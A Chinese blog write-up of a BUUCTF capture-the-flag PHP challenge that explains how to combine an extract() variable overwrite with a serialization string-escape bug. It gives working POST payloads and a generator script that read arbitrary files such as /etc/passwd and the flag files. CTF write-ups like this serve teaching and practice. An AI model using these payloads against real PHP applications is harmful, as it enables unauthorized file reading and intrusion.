BUUCTF [安洵杯 2019]easy_serialize_php 1 详细讲解

已于 2023-08-12 12:37:15 修改
阅读量466 收藏 1
点赞数 1
分类专栏: # web 文章标签: php 网络安全
于 2023-08-12 00:40:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/132240629
版权

题目来自buuctf,这是一题关于php序列化逃逸的题

1. 题目

题目给出的代码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

2. 分析

在这里插入图片描述

extract($_POST);   # 导入变量

$_SESSION['img'] = base64_encode('guest_img.png');  # 改变SESSION[img]=一个固定值

$serialize_info = filter(serialize($_SESSION));  # 序列化SESSION + 过滤,这里造成逃逸

$userinfo = unserialize($serialize_info);   # 反序列化

echo file_get_contents(base64_decode($userinfo['img']));   # base64解码并读取内容

可以看出是通过$_SESSION['img']来读取文件

extract可以将数组中的变量导入当前变量表

也就是说我们可以伪造$_SESSION 数组中的所有数据

_SESSION[user]=123&_SESSION[function]=456

因为extract是在

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

这两条语句后调用的,所有会覆盖里面的变量,但是后面的 $_SESSION[‘img’]覆盖不了
所以我们需要利用filter函数
他将一些关键字进行了置空,也就是从这里发生的逃逸

3. 构造参数

如果你对php序列化的格式不了解,那么你需要先学习一下,这里我粗略讲一下

echo serialize(["a"=>"b","c"=>"d"]);

a:2:{s:1:"a";s:1:"b";s:1:"c";s:1:"d";}

比如序列化一个列表
上面第一个字符 a 表示array(数组)
每个字段由:分隔,后面的2表示这个列表的大小为2
{}里面的内容就是数组的内容了,数组包含键值
s代表字符串,后面1表示这个字符串长度为1,"a"就是它的内容了
;表示结束,里面4个字符串,也就是两对键值对

既然filter能将内容制空,那我们可以做出以下利用

_SESSION[a]=phpflagflagflagflagflagflagflagflagflagflagflagflagflag&_SESSION[img]=1&_SESSION[exp]=;s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";i:0;i:1;}

我们传递的post参数最终会变成这样

"a:3:{s:1:"a";s:55:"";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";s:3:"exp";s:40:";s:3:"img";s:12:"d2xiIGlzIG5i";i:0;i:1;}";}"

我们传递的_SESSION[a]在序列化后会全部被置空,但是!我们的字符串长度还在,就会造成后面的内容被当成字符串
构造只够长的字符串长度,将_SESSION[img]里面的内容掠过,一直覆盖到我们_SESSION[exp]中的内容
可以看出,_SESSION[exp]里面有一个伪造的img内容,通过这种方式,就可以构造任意的_SESSION[img]字段,读取任意文件

后面 的i:0;i:1, i代表数字,0代表键,就是0,值也是数字,值为1,索引为0,值为1

echo serialize([1]);

a:1:{i:0;i:1;}

因为我们覆盖了一个键值对,所以我们需要补充回去,遇到}时就停止检测了,即使后面还有字符串

这里写了个脚本,使用 php 脚本.php即可执行

<?php
$e = "/etc/passwd";    # 这里填写需要读取的文件
$e = base64_encode($e);
echo '_SESSION[a]=phpflagflagflagflagflagflagflagflagflagflagflagflagflag&_SESSION[img]=1&_SESSION[exp]=';
echo ';s:3:"img";s:'.strlen($e).':"'.$e.'";i:0;i:1;}';

这里传递 phpinfo 这个值可以执行phpinfo()查看php信息
在这里插入图片描述
可以看到一个文件 d0g3_f1ag.php 通过读取这个文件拿到flag

_SESSION[a]=phpflagflagflagflagflagflagflagflagflagflagflagflagflag&_SESSION[img]=1&_SESSION[exp]=;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";i:0;i:1;}

在这里插入图片描述

再读取 /d0g3_fllllllag 文件

_SESSION[a]=phpflagflagflagflagflagflagflagflagflagflagflagflagflag&_SESSION[img]=1&_SESSION[exp]=;s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";i:0;i:1;}

在这里插入图片描述
拿下flag

bug小空
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[安洵 2019]easy_serialize_php 1
shinygod的博客
03-04 1754
知识点:反序列化字符串逃逸(2种情形),extract变量覆盖漏洞 目录反序列化字符串逃逸反序列化的规则00x1:过滤后字符变多00x1:过滤后字符变少(本题就是此类型)值替换键替换 反序列化字符串逃逸 一般这类漏洞,都是在序列化之后,过滤,然后反序列化引起的。 反序列化的规则 了解反序列化字符串逃逸之前,先了解反序列化的规则 例如: a:2:{s:4:"user";s:5:"guest";s:8:"function";s:3:"aaa";} //第一个a代表这是一个数组序列化 php反序列化会以 ;
BUUCTF-[极客大挑战 2019]PHP1
Monica的博客
09-27 3656
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BUUCTF-[极客大挑战 2019]PHP 1
qq_57345310的博客
10-13 585
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
BUUCTF-web [极客大挑战 2019]PHP1
zzqzzq11的博客
08-06 854
buuctf
[2019]easy_serialize_php 1
qq_53460654的博客
09-28 1284
打开环境得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
[安洵 2019]easy_serialize_php
最新发布
Yb_140的博客
10-16 468
变量覆盖+反序列化字符串逃逸
[CTF][安洵 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1254
[安洵 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 612
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
[安洵 2019]easy_serialize_php (对象逃逸)
qq_54929891的博客
03-09 3425
老规矩,分析代码,一般给你一大堆代码的题目肯定是其中某个函数有漏洞啥的 过滤函数filter,其中implode函数的作用是:将$filter_arr这个数组合并为一个字符串,并以|分割开来;所以这个正则表达式是preg_replace(/php|flag|php5|php4|f1lg/i,'',$img);filter函数作用就是过滤这五个字符串。 如果$_SESSION存在,则销毁它(unset),然后是字典的键值对的对应,extract这个函数重中之重!!!它会将你post传入的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值